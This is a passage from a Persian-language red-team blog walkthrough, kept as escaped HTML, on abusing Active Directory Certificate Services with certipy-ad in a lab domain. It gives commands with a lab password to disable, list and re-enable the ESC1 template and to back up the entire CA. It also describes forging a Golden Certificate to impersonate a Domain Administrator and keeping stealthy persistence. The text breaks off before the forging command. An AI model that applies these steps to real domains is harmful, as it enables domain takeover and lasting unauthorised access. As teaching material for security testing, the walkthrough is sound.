ESC1 \u06cc\u0627 ESC4 \u062f\u0631 \u062d\u0627\u0644 \u062d\u0627\u0636\u0631 \u0641\u0639\u0627\u0644 \u0647\u0633\u062a\u0646\u062f \u06cc\u0627 \u062e\u06cc\u0631. \u0647\u0645\u0686\u0646\u06cc\u0646 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u0628\u0627 \u0627\u06cc\u0646 \u0631\u0648\u0634 \u0642\u0627\u0644\u0628\u200c\u0647\u0627\u06cc \u062f\u06cc\u06af\u0631\u06cc \u0631\u0627 \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u06a9\u0631\u062f \u06a9\u0647 \u0645\u0645\u06a9\u0646 \u0627\u0633\u062a \u0642\u0627\u0628\u0644\u06cc\u062a \u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc (exploitable) \u062f\u0627\u0634\u062a\u0647 \u0628\u0627\u0634\u0646\u062f \u0648 \u0628\u0631\u0627\u06cc \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 (abuse) \u062f\u0631 \u062d\u0645\u0644\u0627\u062a \u0622\u06cc\u0646\u062f\u0647 \u0645\u0646\u0627\u0633\u0628 \u0628\u0627\u0634\u0646\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-19899\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/21-300x103.png\" alt=\"\" width=\"548\" height=\"188\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/21-300x103.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/21-1024x351.png 1024w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/21-768x264.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/21-150x51.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/21.png 1524w\" sizes=\"(max-width: 548px) 100vw, 548px\" \/><\/span><\/p>\n<p><span style=\"font-size: 10pt\"><strong>\u063a\u06cc\u0631\u0641\u0639\u0627\u0644\u200c\u0633\u0627\u0632\u06cc \u06cc\u06a9 \u0642\u0627\u0644\u0628<\/strong><strong> (Template)<\/strong><\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631 \u0628\u0647 \u0645\u0627 \u0627\u0645\u06a9\u0627\u0646 \u0645\u06cc\u200c\u062f\u0647\u062f \u0642\u0627\u0644\u0628 ESC1 \u0631\u0627 \u0627\u0632 \u0641\u0647\u0631\u0633\u062a \u0642\u0627\u0644\u0628\u200c\u0647\u0627\u06cc \u0645\u0646\u062a\u0634\u0631\u0634\u062f\u0647 \u062a\u0648\u0633\u0637 CA (Certificate Authority) \u063a\u06cc\u0631\u0641\u0639\u0627\u0644 \u06a9\u0646\u06cc\u0645:<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\"><span style=\"font-size: 10pt\">certipy-ad ca -u sanjeet -p Password@12 -dc-ip 192.168.1.20 -target 192.168.1.20 -disable ESC1 -ca ignite-DC01-CA<\/span><\/pre>\n<p><span style=\"font-size: 10pt\"><strong>\u062a\u0648\u0636\u06cc\u062d \u0641\u0646\u06cc<\/strong><strong>:<\/strong><\/span><br \/>\n<span style=\"font-size: 10pt\">\u062f\u0631 \u0627\u06cc\u0646 \u0633\u0646\u0627\u0631\u06cc\u0648\u060c \u0627\u0628\u0632\u0627\u0631 certipy-ad \u0628\u0631\u0627\u06cc \u0628\u0631\u0642\u0631\u0627\u0631\u06cc \u0627\u0631\u062a\u0628\u0627\u0637 \u0628\u0627 CA \u0648 \u0627\u062c\u0631\u0627\u06cc \u0639\u0645\u0644\u06cc\u0627\u062a \u063a\u06cc\u0631\u0641\u0639\u0627\u0644\u200c\u0633\u0627\u0632\u06cc \u0642\u0627\u0644\u0628 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u0634\u0648\u062f. \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u06af\u0632\u06cc\u0646\u0647 -disable ESC1 \u0628\u0627\u0639\u062b \u0645\u06cc\u200c\u0634\u0648\u062f \u0642\u0627\u0644\u0628 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631 ESC1 \u0627\u0632 \u0641\u0647\u0631\u0633\u062a \u0642\u0627\u0644\u0628\u200c\u0647\u0627\u06cc \u0641\u0639\u0627\u0644 \u0648 \u0642\u0627\u0628\u0644 \u062f\u0631\u062e\u0648\u0627\u0633\u062a \u062d\u0630\u0641 \u0634\u0648\u062f. \u0627\u06cc\u0646 \u0627\u0642\u062f\u0627\u0645 \u0645\u0639\u0645\u0648\u0644\u0627\u064b \u0628\u0631\u0627\u06cc \u06a9\u0627\u0647\u0634 \u0633\u0637\u062d \u062d\u0645\u0644\u0647 (attack surface) \u062f\u0631 \u0645\u062d\u06cc\u0637\u200c\u0647\u0627\u06cc \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631 \u06cc\u0627 \u067e\u0633 \u0627\u0632 \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u06cc\u06a9 \u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc \u0645\u0648\u0641\u0642 \u0627\u0632 \u0642\u0627\u0644\u0628 \u0627\u0646\u062c\u0627\u0645 \u0645\u06cc\u200c\u06af\u06cc\u0631\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-19900\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/22-300x30.png\" alt=\"\" width=\"440\" height=\"44\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/22-300x30.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/22-1024x103.png 1024w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/22-768x77.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/22-150x15.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/22.png 1469w\" sizes=\"(max-width: 440px) 100vw, 440px\" \/><\/span><\/p>\n<p><span style=\"font-size: 10pt\"><strong>\u0646\u06a9\u062a\u0647<\/strong><strong>:<\/strong><\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u062a\u06cc\u0645\u200c\u0647\u0627\u06cc \u0622\u0628\u06cc (Blue Teams) \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u0646\u062f \u0627\u0632 \u0627\u06cc\u0646 \u0631\u0648\u0634 \u0628\u0647\u200c\u0639\u0646\u0648\u0627\u0646 \u0628\u062e\u0634\u06cc \u0627\u0632 \u0641\u0631\u0622\u06cc\u0646\u062f \u0627\u0635\u0644\u0627\u062d \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc (remediation) \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u0646\u062f. \u062f\u0631 \u0645\u0642\u0627\u0628\u0644\u060c \u062a\u06cc\u0645\u200c\u0647\u0627\u06cc \u0642\u0631\u0645\u0632 (Red Teams) \u0645\u0645\u06a9\u0646 \u0627\u0633\u062a \u0627\u0632 \u0622\u0646 \u0628\u0631\u0627\u06cc \u0645\u062e\u062a\u0644\u200c\u06a9\u0631\u062f\u0646 \u0641\u0631\u0622\u06cc\u0646\u062f \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc (detection disruption) \u0628\u0647\u0631\u0647 \u0628\u0628\u0631\u0646\u062f. \u0627\u06cc\u0646 \u06a9\u0627\u0631 \u0628\u0627 \u0647\u062f\u0641 \u0642\u0637\u0639 \u0632\u0646\u062c\u06cc\u0631\u0647 \u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc (exploit chain) \u0628\u0647\u200c\u0635\u0648\u0631\u062a \u0645\u0648\u0642\u062a \u0627\u0646\u062c\u0627\u0645 \u0645\u06cc\u200c\u06af\u06cc\u0631\u062f \u062a\u0627 \u062f\u0631 \u0632\u0645\u0627\u0646 \u0645\u0646\u0627\u0633\u0628 \u0645\u062c\u062f\u062f\u0627\u064b \u0627\u0632 \u0622\u0646 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0634\u0648\u062f (\u0647\u0645\u0627\u0646\u200c\u0637\u0648\u0631 \u06a9\u0647 \u062f\u0631 \u0633\u0646\u0627\u0631\u06cc\u0648\u06cc \u0645\u0627 \u0627\u062a\u0641\u0627\u0642 \u0627\u0641\u062a\u0627\u062f\u0647 \u0627\u0633\u062a).<\/span><\/p>\n<p><span style=\"font-size: 10pt\"><strong>\u0628\u0631\u0631\u0633\u06cc \u0648\u0636\u0639\u06cc\u062a \u063a\u06cc\u0631\u0641\u0639\u0627\u0644\u200c\u0633\u0627\u0632\u06cc \u0642\u0627\u0644\u0628<\/strong><\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0628\u0631\u0627\u06cc \u0628\u0631\u0631\u0633\u06cc \u0627\u06cc\u0646\u06a9\u0647 \u0622\u06cc\u0627 \u0642\u0627\u0644\u0628 ESC1 \u0628\u0647\u200c\u062f\u0631\u0633\u062a\u06cc \u063a\u06cc\u0631\u0641\u0639\u0627\u0644 \u0634\u062f\u0647 \u0627\u0633\u062a \u06cc\u0627 \u062e\u06cc\u0631\u060c \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u0645 \u062f\u0633\u062a\u0648\u0631 \u0632\u06cc\u0631 \u0631\u0627 \u0627\u062c\u0631\u0627 \u06a9\u0646\u06cc\u0645:<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\"><span style=\"font-size: 10pt\">certipy-ad ca -u sanjeet -p Password@12 -dc-ip 192.168.1.20 -target 192.168.1.20 -list-templates -ca ignite-DC01-CA<\/span><\/pre>\n<p><span style=\"font-size: 10pt\"><strong>\u0646\u062a\u06cc\u062c\u0647<\/strong><strong>:<\/strong><\/span><br \/>\n<span style=\"font-size: 10pt\">\u062f\u0631 \u062e\u0631\u0648\u062c\u06cc \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631 \u0645\u0634\u0627\u0647\u062f\u0647 \u0645\u06cc\u200c\u0634\u0648\u062f \u06a9\u0647 \u0642\u0627\u0644\u0628 ESC1 \u062f\u06cc\u06af\u0631 \u062f\u0631 \u0645\u06cc\u0627\u0646 \u0642\u0627\u0644\u0628\u200c\u0647\u0627\u06cc \u0641\u0639\u0627\u0644 (enabled templates) \u0645\u0648\u062c\u0648\u062f \u062f\u0631 CA \u0644\u06cc\u0633\u062a \u0646\u0634\u062f\u0647 \u0627\u0633\u062a\u060c \u06a9\u0647 \u062a\u0623\u06cc\u06cc\u062f \u0645\u06cc\u200c\u06a9\u0646\u062f \u0641\u0631\u0622\u06cc\u0646\u062f \u063a\u06cc\u0631\u0641\u0639\u0627\u0644\u200c\u0633\u0627\u0632\u06cc \u0645\u0648\u0641\u0642 \u0628\u0648\u062f\u0647 \u0627\u0633\u062a.<\/span><\/p>\n<p><span style=\"font-size: 10pt\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-19901\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/23-300x102.png\" alt=\"\" width=\"526\" height=\"179\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/23-300x102.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/23-1024x348.png 1024w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/23-768x261.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/23-150x51.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/23.png 1490w\" sizes=\"(max-width: 526px) 100vw, 526px\" \/><\/span><\/p>\n<p><span style=\"font-size: 10pt\"><strong>\u0641\u0639\u0627\u0644\u200c\u0633\u0627\u0632\u06cc \u0645\u062c\u062f\u062f \u06cc\u06a9 \u0642\u0627\u0644\u0628<\/strong><strong> (Re-Enable a Template)<\/strong><\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631\u060c \u0642\u0627\u0644\u0628 ESC1 \u06a9\u0647 \u0642\u0628\u0644\u0627\u064b \u063a\u06cc\u0631\u0641\u0639\u0627\u0644 \u0634\u062f\u0647 \u0628\u0648\u062f \u0631\u0627 \u062f\u0648\u0628\u0627\u0631\u0647 \u0641\u0639\u0627\u0644 \u0645\u06cc\u200c\u06a9\u0646\u062f:<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\"><span style=\"font-size: 10pt\">certipy-ad ca -u sanjeet -p Password@12 -dc-ip 192.168.1.20 -target 192.168.1.20 -enable ESC1 -ca ignite-DC01-CA<\/span><\/pre>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: 10pt\"><strong>\u062a\u0648\u0636\u06cc\u062d \u0641\u0646\u06cc<\/strong><strong>:<\/strong><\/span><br \/>\n<span style=\"font-size: 10pt\">\u0627\u062c\u0631\u0627\u06cc \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631 \u0628\u0647 \u0645\u0627 \u0627\u062c\u0627\u0632\u0647 \u0645\u06cc\u200c\u062f\u0647\u062f \u0642\u0627\u0644\u0628 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631 ESC1 \u0631\u0627 \u0645\u062c\u062f\u062f\u0627\u064b \u062f\u0631 \u0644\u06cc\u0633\u062a \u0642\u0627\u0644\u0628\u200c\u0647\u0627\u06cc \u0641\u0639\u0627\u0644 CA \u0642\u0631\u0627\u0631 \u062f\u0647\u06cc\u0645.<\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0647\u0645\u0627\u0646\u200c\u0637\u0648\u0631 \u06a9\u0647 \u067e\u06cc\u0634\u200c\u062a\u0631 \u0627\u0634\u0627\u0631\u0647 \u0634\u062f\u060c \u0627\u06cc\u0646 \u0627\u0642\u062f\u0627\u0645 \u0628\u0647 \u0645\u0627 \u0627\u062c\u0627\u0632\u0647 \u0645\u06cc\u200c\u062f\u0647\u062f \u0632\u0646\u062c\u06cc\u0631\u0647 \u062d\u0645\u0644\u0647 \u0645\u0628\u062a\u0646\u06cc \u0628\u0631 \u06af\u0648\u0627\u0647\u06cc \u062f\u06cc\u062c\u06cc\u062a\u0627\u0644 (certificate attack chain) \u0631\u0627 \u0645\u062c\u062f\u062f\u0627\u064b \u0631\u0627\u0647\u200c\u0627\u0646\u062f\u0627\u0632\u06cc \u06a9\u0646\u06cc\u0645.<\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0627\u06cc\u0646 \u0631\u0648\u0634 \u0628\u0647\u200c\u0648\u06cc\u0698\u0647 \u062f\u0631 \u0634\u0631\u0627\u06cc\u0637\u06cc \u06a9\u0627\u0631\u0628\u0631\u062f \u062f\u0627\u0631\u062f \u06a9\u0647 \u0645\u062f\u0627\u0641\u0639\u0627\u0646 (defenders) \u0632\u0646\u062c\u06cc\u0631\u0647 \u062d\u0645\u0644\u0647 \u0631\u0627 \u0642\u0637\u0639 \u06a9\u0631\u062f\u0647\u200c\u0627\u0646\u062f. \u062f\u0631 \u0686\u0646\u06cc\u0646 \u0634\u0631\u0627\u06cc\u0637\u06cc\u060c \u0641\u0639\u0627\u0644\u200c\u0633\u0627\u0632\u06cc \u0645\u062c\u062f\u062f \u0642\u0627\u0644\u0628 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u062f\u0631 \u062d\u0645\u0644\u0627\u062a \u062a\u06a9\u0631\u0627\u0631\u06cc Red Team \u06cc\u0627 \u0627\u06cc\u062c\u0627\u062f \u067e\u0627\u06cc\u062f\u0627\u0631\u06cc \u0628\u0644\u0646\u062f\u0645\u062f\u062a (long-term persistence) \u062f\u0631 \u0645\u062d\u06cc\u0637 \u0647\u062f\u0641 \u0645\u0648\u0631\u062f \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0642\u0631\u0627\u0631 \u06af\u06cc\u0631\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-19902\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/24-300x31.png\" alt=\"\" width=\"455\" height=\"47\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/24-300x31.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/24-1024x105.png 1024w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/24-768x78.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/24-150x15.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/24.png 1459w\" sizes=\"(max-width: 455px) 100vw, 455px\" \/><\/span><\/p>\n<p><span style=\"font-size: 10pt\"><strong>\u067e\u0634\u062a\u06cc\u0628\u0627\u0646\u200c\u06af\u06cc\u0631\u06cc \u06a9\u0627\u0645\u0644 \u0627\u0632<\/strong><strong> CA (Full CA Backup)<\/strong><\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631\u060c \u0627\u0632 \u06a9\u0644 \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc CA (Certificate Authority) \u0634\u0627\u0645\u0644 \u0642\u0627\u0644\u0628\u200c\u0647\u0627 (templates)\u060c \u0645\u062c\u0648\u0632\u0647\u0627 (permissions) \u0648 \u062a\u0646\u0638\u06cc\u0645\u0627\u062a (settings) \u0646\u0633\u062e\u0647 \u067e\u0634\u062a\u06cc\u0628\u0627\u0646 \u062a\u0647\u06cc\u0647 \u0645\u06cc\u200c\u06a9\u0646\u062f:<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\"><span style=\"font-size: 10pt\">certipy-ad ca -backup -u sanjeet -p Password@12 -dc-ip 192.168.1.20 -target 192.168.1.20 -ca ignite-DC01-CA<\/span><\/pre>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: 10pt\"><strong>\u062a\u0648\u0636\u06cc\u062d \u0641\u0646\u06cc<\/strong><strong>:<\/strong><\/span><br \/>\n<span style=\"font-size: 10pt\">\u0627\u062c\u0631\u0627\u06cc \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631 \u062f\u06cc\u062f \u06a9\u0627\u0645\u0644 (full visibility) \u0646\u0633\u0628\u062a \u0628\u0647 \u0648\u0636\u0639\u06cc\u062a \u0641\u0639\u0644\u06cc \u0639\u0645\u0644\u06a9\u0631\u062f CA \u0641\u0631\u0627\u0647\u0645 \u0645\u06cc\u200c\u06a9\u0646\u062f. \u0627\u06cc\u0646 \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u0628\u0647 \u0645\u0627 \u0627\u0645\u06a9\u0627\u0646 \u0645\u06cc\u200c\u062f\u0647\u062f \u062a\u0627 \u062a\u0635\u0645\u06cc\u0645 \u0628\u06af\u06cc\u0631\u06cc\u0645 \u06a9\u0647 \u0622\u06cc\u0627 \u0645\u06cc\u200c\u062e\u0648\u0627\u0647\u06cc\u0645 \u0648\u0636\u0639\u06cc\u062a CA \u0631\u0627:<\/span><\/p>\n<ul>\n<li><span style=\"font-size: 10pt\">\u062a\u063a\u06cc\u06cc\u0631 (modify) \u062f\u0647\u06cc\u0645<\/span><\/li>\n<li><span style=\"font-size: 10pt\">\u0627\u0633\u062a\u062e\u0631\u0627\u062c (exfiltrate) \u06a9\u0646\u06cc\u0645<\/span><\/li>\n<li><span style=\"font-size: 10pt\">\u06cc\u0627 \u0628\u0627 \u06cc\u06a9 \u0646\u0633\u062e\u0647 \u062c\u0639\u0644\u06cc \u062c\u0627\u06cc\u06af\u0632\u06cc\u0646 (replace) \u0646\u0645\u0627\u06cc\u06cc\u0645<\/span><\/li>\n<\/ul>\n<p><span style=\"font-size: 10pt\">\u0627\u06cc\u0646 \u0639\u0645\u0644\u06cc\u0627\u062a \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u062f\u0631 \u0633\u0646\u0627\u0631\u06cc\u0648\u0647\u0627\u06cc\u06cc \u0645\u0627\u0646\u0646\u062f \u062c\u0639\u0644 \u0642\u0627\u0644\u0628\u200c\u0647\u0627 (template forgery)\u060c \u0635\u062f\u0648\u0631 \u06af\u0648\u0627\u0647\u06cc \u0637\u0644\u0627\u06cc\u06cc (Golden Certificate)\u060c \u06cc\u0627 \u0628\u0627\u0632\u06af\u0631\u062f\u0627\u0646\u062f\u0646 \u0648\u0636\u0639\u06cc\u062a \u0642\u0628\u0644\u06cc \u062c\u0647\u062a \u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc (rollback exploits) \u0628\u0647\u200c\u06a9\u0627\u0631 \u0631\u0648\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\"><strong>\u0646\u0642\u0637\u0647 \u0627\u0648\u062c \u062d\u0645\u0644\u0647: \u062a\u0633\u0644\u0637 \u0628\u0631 \u0632\u06cc\u0631\u0633\u0627\u062e\u062a<\/strong><\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u062f\u0631 \u0627\u06cc\u0646 \u0645\u0631\u062d\u0644\u0647 \u0627\u0632 \u062d\u0645\u0644\u0647\u060c \u062f\u06cc\u06af\u0631 \u0635\u0631\u0641\u0627\u064b \u0628\u0647 \u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc \u0627\u0632 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627 \u0645\u062a\u06a9\u06cc \u0646\u06cc\u0633\u062a\u06cc\u0645. \u0628\u0644\u06a9\u0647 \u06a9\u0646\u062a\u0631\u0644 \u0645\u0633\u062a\u0642\u06cc\u0645 \u0628\u0631 \u0646\u062d\u0648\u0647 \u062a\u0648\u0632\u06cc\u0639 \u0627\u0639\u062a\u0645\u0627\u062f \u062f\u06cc\u062c\u06cc\u062a\u0627\u0644 (digital trust) \u062f\u0631 \u0633\u0637\u062d \u062f\u0627\u0645\u0646\u0647 (domain) \u0628\u0647\u200c\u062f\u0633\u062a \u0622\u0645\u062f\u0647 \u0627\u0633\u062a. \u0627\u06cc\u0646 \u0645\u0648\u0636\u0648\u0639 \u0646\u0634\u0627\u0646\u200c\u062f\u0647\u0646\u062f\u0647 \u0646\u0641\u0648\u0630 \u0639\u0645\u06cc\u0642 \u0628\u0647 \u0632\u06cc\u0631\u0633\u0627\u062e\u062a \u0627\u0645\u0646\u06cc\u062a\u06cc \u0633\u0627\u0632\u0645\u0627\u0646 \u0648 \u062a\u0633\u0644\u0637 \u0628\u0631 \u06cc\u06a9\u06cc \u0627\u0632 \u062d\u06cc\u0627\u062a\u06cc\u200c\u062a\u0631\u06cc\u0646 \u0645\u0624\u0644\u0641\u0647\u200c\u0647\u0627\u06cc \u0622\u0646 \u06cc\u0639\u0646\u06cc \u0633\u0631\u0648\u06cc\u0633 \u0635\u062f\u0648\u0631 \u06af\u0648\u0627\u0647\u06cc \u0627\u0633\u062a.<\/span><\/p>\n<p><span style=\"font-size: 10pt\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-19903\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/25-300x70.png\" alt=\"\" width=\"596\" height=\"139\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/25-300x70.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/25-1024x239.png 1024w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/25-768x179.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/25-150x35.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/25.png 1424w\" sizes=\"(max-width: 596px) 100vw, 596px\" \/><\/span><\/p>\n<p><span style=\"font-size: 10pt\"><strong>\u0646\u06a9\u062a\u0647<\/strong><strong>:<\/strong><\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u062f\u0631 \u0627\u06cc\u0646 \u0645\u0631\u062d\u0644\u0647\u060c \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 AD CS \u0627\u0632 \u06cc\u06a9 \u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc \u0644\u062d\u0638\u0647\u200c\u0627\u06cc (one-time exploit) \u0628\u0647 \u06cc\u06a9 \u0627\u0633\u062a\u0631\u0627\u062a\u0698\u06cc \u0645\u0627\u0646\u062f\u06af\u0627\u0631\u06cc \u0645\u062e\u0641\u06cc\u0627\u0646\u0647 \u0648 \u0628\u0644\u0646\u062f\u0645\u062f\u062a \u062f\u0631 \u062f\u0627\u0645\u0646\u0647 (long-term, stealthy domain persistence) \u062a\u0628\u062f\u06cc\u0644 \u0645\u06cc\u200c\u0634\u0648\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\"><strong>\u062c\u0639\u0644 \u0648 \u0631\u0644\u0647 \u06a9\u0631\u062f\u0646 \u06af\u0648\u0627\u0647\u06cc\u200c\u0647\u0627<\/strong><strong> (Forging &amp; Relaying Certificates)<\/strong><\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0628\u0627 \u062f\u0631 \u0627\u062e\u062a\u06cc\u0627\u0631 \u062f\u0627\u0634\u062a\u0646 \u06a9\u0644\u06cc\u062f \u062e\u0635\u0648\u0635\u06cc CA\u060c \u0645\u0627 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u0645 \u06cc\u06a9 \u06af\u0648\u0627\u0647\u06cc \u062f\u06cc\u062c\u06cc\u062a\u0627\u0644 \u062c\u0639\u0644 \u06a9\u0646\u06cc\u0645 \u06a9\u0647 \u0647\u0648\u06cc\u062a Domain Administrator \u0631\u0627 \u0634\u0628\u06cc\u0647\u200c\u0633\u0627\u0632\u06cc (impersonate) \u0645\u06cc\u200c\u06a9\u0646\u062f. \u0647\u0645\u0686\u0646\u06cc\u0646 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u0645 \u0627\u0632 \u0637\u0631\u06cc\u0642 \u0642\u0627\u0644\u0628\u200c\u0647\u0627\u06cc \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u060c \u0627\u0642\u062f\u0627\u0645 \u0628\u0647 \u062f\u0631\u062e\u0648\u0627\u0633\u062a \u06af\u0648\u0627\u0647\u06cc SubCA \u06a9\u0631\u062f\u0647 \u0648 \u0622\u0646 \u0631\u0627 \u0628\u0647\u200c\u0635\u0648\u0631\u062a \u062f\u0633\u062a\u06cc \u062a\u0623\u06cc\u06cc\u062f (approve) \u06a9\u0646\u06cc\u0645.<\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u062f\u0631 \u0627\u062f\u0627\u0645\u0647\u060c \u0628\u0627 \u0627\u0641\u0632\u0648\u062f\u0646 \u062e\u0648\u062f\u0645\u0627\u0646 \u0628\u0647\u200c\u0639\u0646\u0648\u0627\u0646 Certificate Officer\u060c \u0633\u0637\u062d \u062f\u0633\u062a\u0631\u0633\u06cc \u062e\u0648\u062f \u0631\u0627 \u0627\u0631\u062a\u0642\u0627\u0621 \u0645\u06cc\u200c\u062f\u0647\u06cc\u0645. \u0627\u06cc\u0646 \u062c\u0627\u06cc\u06af\u0627\u0647 \u0628\u0647 \u0645\u0627 \u0627\u0645\u06a9\u0627\u0646 \u0645\u06cc\u200c\u062f\u0647\u062f:<\/span><\/p>\n<ul>\n<li><span style=\"font-size: 10pt\">\u0635\u062f\u0648\u0631 (issue)<\/span><\/li>\n<li><span style=\"font-size: 10pt\">\u062a\u0623\u06cc\u06cc\u062f (approve)<\/span><\/li>\n<li><span style=\"font-size: 10pt\">\u0648 \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a (authenticate)<\/span><\/li>\n<\/ul>\n<p><span style=\"font-size: 10pt\">\u0631\u0627 \u0628\u0631\u0627\u06cc \u0647\u0631 \u0647\u0648\u06cc\u062a\u06cc \u062f\u0631 \u062f\u0627\u0645\u0646\u0647 \u0627\u0646\u062c\u0627\u0645 \u062f\u0647\u06cc\u0645. \u062f\u0631 \u0627\u06cc\u0646 \u062d\u0627\u0644\u062a\u060c \u0632\u0646\u062c\u06cc\u0631\u0647 \u0627\u0639\u062a\u0645\u0627\u062f \u062f\u0627\u0645\u0646\u0647 (domain trust chain) \u0639\u0645\u0644\u0627\u064b \u0628\u0647 \u0632\u0645\u06cc\u0646 \u0628\u0627\u0632\u06cc \u0645\u0627 \u062a\u0628\u062f\u06cc\u0644 \u0645\u06cc\u200c\u0634\u0648\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\"><strong>\u062c\u0639\u0644 \u06af\u0648\u0627\u0647\u06cc \u0627\u062f\u0645\u06cc\u0646 \u0637\u0644\u0627\u06cc\u06cc<\/strong><strong> (Forge a Golden Admin Certificate)<\/strong><\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u062f\u0633\u062a\u0648\u0631 \u0632\u06cc\u0631\u060c \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u06a9\u0644\u06cc\u062f 